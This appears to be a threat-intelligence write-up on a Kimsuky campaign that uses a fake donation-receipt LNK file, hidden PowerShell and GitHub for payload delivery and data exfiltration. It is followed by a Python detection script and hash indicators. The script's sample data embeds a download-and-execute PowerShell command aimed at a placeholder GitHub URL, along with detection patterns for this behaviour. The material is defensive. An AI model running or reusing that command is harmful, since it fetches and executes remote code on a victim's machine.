Malware alert impersonating child-welfare donation receipts: analysis of Kimsuky activity

2025-09-01 Sakai Malware Alert Impersonating Child Welfare Donations: Analysis of Kimsuky Activity

https://wezard4u.tistory.com/429584


The source attributes to Kimsuky a Korean-language lure named “donation receipt.pdf.lnk,” a shortcut disguised as a Hangul document and child-welfare donation receipt. When executed, the LNK launches hidden PowerShell, decodes embedded Base64 content, writes a second-stage script to the temp directory, and downloads additional payloads from GitHub and raw.githubusercontent.com. The script registers a scheduled task named “BitLocker MDM policy Refresh” for persistence, stages host-specific scripts in a GitHub repository, and uploads collected files through the GitHub API as Base64-encoded content. The activity matters because GitHub serves both as delivery infrastructure and as a data-exfiltration channel, while layered Base64 encoding, obfuscated variables, temporary-file cleanup, and hidden PowerShell execution support evasion.
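As an added defensive illustration (not code from the original post or from the report it summarises), the following Python runs three checks over constructed process-creation and scheduled-task records shaped like the chain above: a hidden, Base64-encoded PowerShell launch, a decoded command that fetches from GitHub, and a task registered under the reported persistence name. The event layout, field names and sample command lines are assumptions, not any product's telemetry schema.

```python
import base64
import re

# Constructed sample telemetry (not taken from the report): one hidden encoded PowerShell
# launch, one scheduled-task registration like the one reported, and one benign process.
PAYLOAD = "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/example/repo/main/s.ps1')"
ENC = base64.b64encode(PAYLOAD.encode("utf-16-le")).decode()
SAMPLE_EVENTS = [
    {"type": "process", "cmdline": f"powershell.exe -WindowStyle Hidden -EncodedCommand {ENC}"},
    {"type": "task", "name": "BitLocker MDM policy Refresh",
     "action": r"powershell.exe -w hidden -File C:\Users\u\AppData\Local\Temp\stage2.ps1"},
    {"type": "process", "cmdline": r"notepad.exe C:\Users\u\notes.txt"},
]

HIDDEN = re.compile(r"-w(?:indowstyle)?\s+hidden", re.I)  # -WindowStyle Hidden / -w hidden
ENCODED = re.compile(r"-e(?:nc|ncodedcommand)?\s+([A-Za-z0-9+/=]{16,})", re.I)
GITHUB = re.compile(r"https?://(?:raw\.githubusercontent\.com|(?:api\.)?github\.com)/", re.I)
TASK_NAME = "bitlocker mdm policy refresh"  # persistence task name reported above

def decode_encoded_command(cmdline):
    """Return the -EncodedCommand payload decoded as UTF-16LE, or '' if absent or invalid."""
    m = ENCODED.search(cmdline)
    if not m:
        return ""
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return ""

def check(ev):
    """Return the reasons this event resembles the reported chain (empty list if none)."""
    reasons = []
    if ev["type"] == "process":
        cmd = ev["cmdline"]
        if "powershell" in cmd.lower() and HIDDEN.search(cmd):
            reasons.append("hidden PowerShell window")
        decoded = decode_encoded_command(cmd)
        if decoded:
            reasons.append("Base64-encoded command")
            if GITHUB.search(decoded):
                reasons.append("GitHub fetch inside decoded command")
    else:  # scheduled-task registration record
        if ev["name"].strip().lower() == TASK_NAME:
            reasons.append("task name matches reported persistence task")
        if HIDDEN.search(ev["action"]) and "\\temp\\" in ev["action"].lower():
            reasons.append("hidden PowerShell launched from Temp")
    return reasons

def triage(events):
    """Return [(index, reasons)] for every event that trips at least one check."""
    return [(i, check(ev)) for i, ev in enumerate(events) if check(ev)]
```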

Indicators of Compromise

Type Value First Seen Last Seen
HASH 3e3e9c0242bef0ff898640f50b7837e8 2025-09-01 2025-09-01
HASH fe71887782586e351888b90502a5ec7… 2025-09-01 2025-09-01
HASH 5833392068b7f84ac0b4b1769e4d9ea… 2025-09-01 2025-09-01
